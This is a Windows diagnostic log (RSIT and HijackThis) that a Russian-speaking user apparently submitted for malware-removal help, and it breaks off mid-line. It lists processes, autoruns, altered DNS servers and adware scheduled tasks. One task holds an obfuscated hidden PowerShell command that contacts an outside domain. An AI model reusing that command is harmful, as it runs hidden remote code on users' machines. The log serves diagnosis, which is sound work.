﻿Лог утилиты random's system information tool 1.12(автор: random/random)
Run by Владислав at 2016-04-14 11:41:45
Microsoft Windows 7 Максимальная  Service Pack 1
Системный раздел C: размер 11 GB (18%) Свободно 60 GB
Total RAM: 4023 MB (57% free)
X64

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 11:41:45, on 14.04.2016
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.16428)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\BaiduProtect.exe
C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\lpclient.exe
C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files (x86)\Media Saver\Basement\MSLSService.exe
C:\Windows\SysWOW64\PnkBstrA.exe
C:\Windows\SysWOW64\svchost.exe
C:\Program Files (x86)\Media Saver\Basement\MSLServer.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Users\Владислав\Desktop\AutoLogger\AutoLogger.exe
C:\Users\Владислав\Desktop\AutoLogger\AutoLogger\AVZ\avz.exe
C:\PROGRA~2\Opera\36.0.2130.46\opera.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\PROGRA~2\Opera\36.0.2130.46\opera_crashreporter.exe
C:\PROGRA~2\Opera\36.0.2130.46\opera.exe
C:\PROGRA~2\Opera\36.0.2130.46\opera.exe
C:\PROGRA~2\Opera\36.0.2130.46\opera.exe
C:\PROGRA~2\Opera\36.0.2130.46\opera.exe
C:\PROGRA~2\Opera\36.0.2130.46\opera.exe
C:\PROGRA~2\Opera\36.0.2130.46\opera.exe
C:\PROGRA~2\Opera\36.0.2130.46\opera.exe
C:\PROGRA~2\Opera\36.0.2130.46\opera.exe
C:\Users\Владислав\Desktop\AutoLogger\AutoLogger\RSIT\Владислав_RSITx64.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yandex.ru/?win=213&clid=1985535-216
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = 
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: MSaver - {12E8A6C2-B125-479F-AB3C-13B8757C7F04} - (no file)
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [GenieFloater] C:\Program Files (x86)\Genie Soft\Genie Cleaner\GenieFloater.exe
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O8 - Extra context menu item: &Экспорт в Microsoft Excel - res://C:\PROGRA~2\MICROS~1\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: (no name) - {8DAE90AD-4583-4977-9DD4-4360F7A45C74} - (no file)
O9 - Extra button: Справочные материалы - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\MICROS~1\OFFICE11\REFIEBAR.DLL
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O17 - HKLM\System\CCS\Services\Tcpip\..\{2EE19065-9E2C-4E5F-B133-74B195023039}: NameServer = 195.38.33.2,195.38.32.3
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: NameServer = 82.163.142.5 95.211.158.132
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: NameServer = 82.163.142.5 95.211.158.132
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: NameServer = 82.163.142.5 95.211.158.132
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: BDSGRTP Service (BDSGRTP) - ????????(??)???? - C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\BaiduProtect.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Служба Google Update (gupdate) (gupdate) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (file missing)
O23 - Service: Служба Google Update (gupdatem) (gupdatem) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Local Policy Client - Unknown owner - C:\Windows\SysWOW64\lpclient.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: MSLSService - Unknown owner - C:\Program Files (x86)\Media Saver\Basement\MSLSService.exe
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 7684 bytes

======Список процессов======



\SystemRoot\System32\smss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
wininit.exe
winlogon.exe
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
"C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\BaiduProtect.exe" -r
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
atieclxx
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
"C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe" /service
"taskhost.exe"
taskeng.exe {F57529CA-A9DC-4295-8751-6EB769AD3F25}
"C:\Windows\system32\Dwm.exe"
"C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe" /service
C:\Windows\Explorer.EXE
C:\Windows\SysWOW64\svchost.exe -k netsvcs
C:\Windows\SysWOW64\svchost.exe -k Intel(R)
"C:\Windows\SysWOW64\lpclient.exe" /Svc
"C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE"
"C:\Program Files (x86)\Media Saver\Basement\MSLSService.exe"
C:\Windows\SysWOW64\PnkBstrA.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\SysWOW64\svchost.exe -k AudioDrv
C:\Windows\System32\alg.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
"C:\Program Files (x86)\Media Saver\Basement\MSLServer.exe"
"C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
"C:\Windows\System32\WUDFHost.exe" -HostGUID:{193a1820-d9ac-4997-8c55-be817523f6aa} -IoEventPortName:HostProcess-1b1a22fd-2a1d-42a2-97c7-afcf104eeec9 -SystemEventPortName:HostProcess-8ffe7498-e58a-41f7-93b7-cc27ebfb044f -IoCancelEventPortName:HostProcess-9bec6e40-4ad2-4c63-a774-a5f6c83ace56 -NonStateChangingEventPortName:HostProcess-ec9d80fa-097e-4487-89af-44088c5fb392 -ServiceSID:S-1-5-80-2652678385-582572993-1835434367-1344795993-749280709 -LifetimeId:dcf22c91-1434-4938-a639-9cc12c1938d0 -DeviceGroupId:WpdFsGroup
C:\Windows\system32\SearchIndexer.exe /Embedding
"C:\Users\Владислав\Desktop\AutoLogger\AutoLogger.exe" 
"C:\Users\Владислав\Desktop\AutoLogger\AutoLogger\AVZ\avz.exe" Script=AVZ\GeneralScript.txt HiddenMode=0
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://google.ru
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" -noautoupdate --ran-launcher -- http://google.ru/
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2628 CREDAT:275457 /prefetch:2
"C:\PROGRA~2\Opera\36.0.2130.46\opera_crashreporter.exe" -noautoupdate --ran-launcher --crash-reporter-parent-id=2880 -- http://google.ru/
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=gpu-process --channel="2880.0.2119134540\1663165305" --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --supports-dual-gpus=false --gpu-driver-bug-workarounds=3,14,31,60 --gpu-vendor-id=0x1002 --gpu-device-id=0x68d9 --gpu-driver-vendor="Advanced Micro Devices, Inc." --gpu-driver-version=13.200.0.0 --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --ignored=" --type=renderer "
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --lang=ru --extension-process --enable-webrtc-hw-h264-encoding --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="2880.2.1363566271\188403658"
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --lang=ru --extension-process --enable-webrtc-hw-h264-encoding --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="2880.3.617472246\1563225620"
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --lang=ru --extension-process --enable-webrtc-hw-h264-encoding --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="2880.4.1429595856\244991037"
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --lang=ru --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="2880.5.751183880\449359839"
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --lang=ru --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="2880.10.1932977831\1974985451"
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --lang=ru --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="2880.13.1026235624\1530003683"
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=ppapi --channel="2880.15.751496515\2138858163" --ppapi-flash-args --lang=ru --device-scale-factor=1 --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --ignored=" --type=renderer "

C:\Windows\System32\svchost.exe -k WerSvcGroup
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe4_ Global\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" 
"C:\Windows\system32\SearchFilterHost.exe" 0 520 524 532 65536 528 
C:\Windows\system32\wbem\wmiprvse.exe
C:\Users\Владислав\Desktop\AutoLogger\AutoLogger\RSIT\RSITx64.exe /silent /m3 /autolog /logfolder "C:\Users\Владислав\Desktop\AutoLogger\AutoLogger\RSIT\Log"

======Папка назначеных зданий======

C:\Windows\tasks\Adobe Flash Player PPAPI Notifier.job - C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_213_pepper.exe -check pepperplugin
C:\Windows\tasks\Adobe Flash Player Updater.job - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe 
C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1059553410-1956651935-2154180951-1000Core.job - C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe /c
C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1059553410-1956651935-2154180951-1000UA.job - C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
C:\Windows\tasks\GVMTKIX.job - C:\Users\���������\AppData\Roaming\GVMTKIX.exe /infocmdline=RBtWEIvEMoSS4IJ7aTfa9RW57kpXBCx66TjLhMMxOckbqxMKzVBPP/I4UCKuzeL0PaA8POUyFUEdbMSZbOfn5oWDYP7TugnqjNXRK8Bs5Mqs1MCNAu0CrGm+uQwU95kb+Qb/niaeOidoKbMhqKKd2kpZibXi/dptDaLH/qgV7FpEF+cSGrC1bZtrqgpNNk2aglvRwbSITeqEa71lQ+93T85rfM+ZR4kf+Bwqii7N/0Px/yV57J59cj1YTc392Z0DmaWtxAT/3olQe1X553zoMCRXA2pfMw3LB3o8+qbnrMjOkBO+ca4nUtJirVFRnpfILZG31QXkIzqDFW1hGnvr+34hrD9JS8pz5GpbpKAqBA/I2Y8SDdIOGmfQd/R0/T5Anlo3K566BFux8mmsLNXf4nv4xOnNB+akqPmSgXYSIi8Tj35+2RuIHD7VlU7khOx3gRyiNfom/PqVp4ZmhSTEnOlsuxN0fNxohYVIxiEld/0t8acaGrMMEl2Dy9S8r8noqA5POcZgiGcz88A0D/owDv2EW28VYmjIYUpcNAfwwBd8A7nOqSIXtDw3Vqe0JeZHQr6Yp/Ves+OqMM8587Ryv2iCkwpevi6rrr9x9A4crcJfU6S+2xTNAyYBSdpWy9qW1vh9vSUNyhCrdLSjq0PfHww9PoW/hIZdMw4hjfXxM70=
C:\Windows\tasks\MagicKeys.job - c:\programdata\{6ef5c04c-c64c-f075-6ef5-5c04cc640133}\3113341408602753693e.exe --startup=1 --single
C:\Windows\tasks\Update Service for Media Saver.job - C:\Program Files (x86)\Media Saver\8W7crcC.exe 
C:\Windows\tasks\Update Service for Media Saver2.job - C:\Program Files (x86)\Media Saver\8W7crcC.exe 
C:\Windows\tasks\Update Service for VK Downloader.job - C:\Program Files (x86)\VK Downloader\kfCFztp.exe.exe 
C:\Windows\tasks\Update Service for VK Downloader2.job - C:\Program Files (x86)\VK Downloader\kfCFztp.exe.exe 
C:\Windows\tasks\Обновление Браузера Яндекс .job - C:\Users\Владислав\AppData\Local\Yandex\YandexBrowser\Application\browser.exe  --background-update
C:\Windows\system32\tasks\Adobe Flash Player PPAPI Notifier - C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_213_pepper.exe -check pepperplugin
C:\Windows\system32\tasks\Adobe Flash Player Updater - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe 
C:\Windows\system32\tasks\GoogleUpdateTaskUserS-1-5-21-1059553410-1956651935-2154180951-1000Core - C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe /c
C:\Windows\system32\tasks\GoogleUpdateTaskUserS-1-5-21-1059553410-1956651935-2154180951-1000UA - C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
C:\Windows\system32\tasks\Kometa up - C:\Users\Владислав\AppData\Local\Kometa\kometaup.exe 
C:\Windows\system32\tasks\MailRuUpdateTask - C:\Users\Владислав\AppData\Local\Mail.Ru\MailRuUpdater.exe --scheduler
C:\Windows\system32\tasks\Opera scheduled Autoupdate 1389276660 - C:\PROGRA~2\Opera\launcher.exe --scheduledautoupdate $(Arg0)
C:\Windows\system32\tasks\Style Mart - C:\Windows\system32\rundll32.exe "C:\Users\Владислав\AppData\Local\Style Mart\Bin\StyleMart.dll",#3
C:\Windows\system32\tasks\Update Service for VK Downloader - C:\Program Files (x86)\VK Downloader\kfCFztp.exe.exe 
C:\Windows\system32\tasks\Update Service for VK Downloader2 - C:\Program Files (x86)\VK Downloader\kfCFztp.exe.exe 
C:\Windows\system32\tasks\ZetaUpdate - C:\Program Files (x86)\ZetaGames\Upd.exe
C:\Windows\system32\tasks\{0A0B0B47-7D0A-0D7D-0B11-7E7D0F0A110A} - C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAZQBjAHUAcgBlAGIALgBpAG4AZgBvAC8AdQAvAD8AYQA9AEQAOQAxAGwAUgBJAEoAdQBzAF8AMABPAGQAOQBpAEUAeQBVAFEAWQBXADQAdABJAEUAeQBmAGIAYQBJADcATABwAHMAdQBYAHgAaABLAGEAXwBrAG4AbgBoAGwAVgBNAEoATABfAFUAYwBYADQAVwBrADMAUgBmAGYASwA2AFEAWQAyADcAUQBiADgASgAtAGoAVABNAGkAQgB4AE0ARQBHAEoANgBiAGwAaAB4AGQAdgBhAFYAOAAwADgASQB2AGwAWABtAGsAeAB0AGYAbAAxAEUAdgBXADgANwBEAHMAcgBBAHQAQgA5ADMAeQBEAE4AQwA1AG4ARABlAGMATgBuAE4AcABsAGIAaQBxAFoATwBEAEoAcABoAEQAWABRAFoAbABkAFAASgBJAHgARgBCAGgARgBMAGMAUgB4AHkASQBpADMAVQAxAEEAVwBfAHYAWAAwAEIAbwBKAHIAawA5AHoAYQBiAHQAaAB5AHEASQA2AGgARQBPAFMAMwBFAFgAOABSAHoARgBIAFkAcAByAFkAdgB2AEkAMQBOAHUARAA1AGEAMABWAFoAagBIAG8AZAAzAEwAYwA3AEMAawBZAG0ATABoADIAegBOAHoAbQBkAFQAOQBRAHIAeQBHAGMAWgBDAHYATwBMAEkANAB4ADUAdQB3AE4AWQBZAGQAYgBFAEMAcgBCAFIAdABZAHIAMABEADAAZwBxAGsAbwAyAFUAVwBTAHMARwBYADIARgBHAE8AMwBDAFEANgAzAFkAbwBjAGgAbwBmAG8AQwB5AGIAMQBGADgATwBWAHAAcQBsADIASABzAE0ALQBqAFIAUgBmADIAWABCADUALQBSAEYAbQBhAHoAaQB0AGcAUwByAEsAQgA5AE4AUgBsAHEAdwBOAGMAcAAxAFMAWQBFAHMAaABfAHQARQBQAGwAYQA5AHMAVQA1AFEASwBiAEMAcwBYAGsAdAByAEgAcgB6AGMAcABRAGIATABGAFEAdQBiAEcATgBwAHEANwBOAHQAYgBQAG4AcABFAFYAdgA5AGoAVQBrAHUAUQBFAGMATgAwAFYAZQA4AEMAawBKAFEAYgB6AFQAMwBwAHIANABHAGMAUQBzAE4ATwA5AF8AMQBVAFUAawBhAE0AZAA0AFcAaABsAHcAXwBLADUAMwBlAHgAYQBvAF8AegBhAFUAOQBzAFEAUwBGAEEAdQA0AHoAYgB6AHoARgB3AGYASgBfAHoAMABrAGwATABBAG0ATQBiAG8AZgBLAEQATgBmAC0AdwBVAEYAUwAtAHIAagBsAGEATABrAGYASwBUAHoALQBVAFEARwBaAEYANQBfADUAcwBRADMAagBUAHAAdABHAFEAUQBkAHcASwBhAEoAQQBFADgAXwBZAEkAQQBkAF8AbwBZADMAYgA0AGgAaQBqAHUAYQAyAFcAdQBEAFYAVgBqAEEAMABEAFEANQBLAG8AUABMAFQAVABYAEYASgB0AFIAUwB6AEgAYQBnAC0AbgA5AGEAeQAxADMAaABtAFcAVAB4AGMAQwBxAEIAZgAtAFkAdgByADIAQQBwAFkAWQA3AHgAbABxAEQAUQBzAEYAUwByAEwAdwBTAEcAUwBBADQAeAA1ADAAYQBpADkAcABFAEQASgBmAG4AWgBnAEwAUgBVAFYASwBOAGIAaQByAGUAVAB6AFkAZwBCADEAVAA2ADMAaQAxADUAVgBNAFEAagBtAHUAbABFAGcAZgBKAHYAdQBWAFAAcAB6AEwAWgBFAEIAVQBQAGkAVAA4AEsASABzAHMAQQBzADEAVABkAGwAUABsAFAAdwB4AFoAXwBEADAAVQBNAE0ANABhAEgAdgBFAEUAYQB2AEMARAA0AFYAcgBIAGMAQQBJAFEAbgBIAFQASgBDAEMAeQBmAFkAXwBvAHMAMABZAGkANwB2AGMAOABGAEwAdQBuAHoANAA1AEgAeABvAG0AQwBmAHYAWQBIAGwAdABDAHgATwAtAEQAdQBvAEsANQBXAEUAegBnAGEARQBPAGwAbgBqAHAAcgBWAHIAeQ